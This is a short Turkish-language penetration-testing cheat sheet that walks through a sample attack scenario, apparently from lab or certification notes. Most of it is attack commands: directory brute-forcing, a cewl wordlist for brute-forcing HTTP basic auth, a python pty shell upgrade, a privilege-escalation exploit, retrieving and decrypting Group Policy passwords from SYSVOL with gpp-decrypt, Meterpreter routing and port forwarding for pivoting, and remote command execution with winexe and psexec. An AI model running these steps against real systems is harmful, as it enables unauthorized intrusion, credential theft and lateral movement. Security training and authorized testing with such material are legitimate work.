Örnek Bir Senaryo

Senayo 1:

Hedef web uygulamasına dirbuster başlat. (wordlist: /usr/share/dirbuster/wordlist/directory-list-1.0.txt)
HTTP basic auth mekanizmasına brute-force saldırısı yap. Bu işlem için cewl aracını kullan.
cewl domain.com -m 6 -w /root/file.txt 2 > /dev/null
hash-identifier aracını kullanılan hash algoritmasını öğrenmek için kullanılabilir.
Kullanılan web uygulamasına ait exploit googledan araştırılır.
python -c 'import pty; pty.spawn("/bin/bash")' EXPORT TERM=linux
OS info; cat /etc/issue
Priv. esc. için googledan exploit aratılır. (gimmeroot.c)
Root olduktan sonra .htaccess dosyasından izin verilen ip adresleri öğrenilir.
post/windows/gather/enum_domain domain adı ve DC adına ait bilgileri getirir. Aşağıdaki komut DC'de bulunan grup policy dosyasını bulmak için kullanılır. Grup policy dosyasında kullanıcıya ait parola bilgisi yer alabilir. net use z: \MACHINE_IP\SYSVOL
Grup policy dosyasında bulunan parola gpp-decrypt aracı kullanılarak kırılabilir.

Port Forwarding ve Routing Meterpreter

Meterpreter oturumu elde edilen makine üzerinde meterpreter backgrounda alındıktan sonra aşağıdaki komut yardımıyla route kuralı tanımlanır.
msf > route add TARGET SUBNET METERPRETER_SESSION
Meterpreter oturumu elde edilen makinenin 445 portuna gelen trafiği "X.X.X.X" ip adresinin 445 portuna yönlendir.
meterpreter > portfwd add -l 445 -p 445 -r X.X.X.X

winexe

# winexe -U Administrator%Password //IP "cmd"
# psexec.py ./eviluser:Password@IP cmd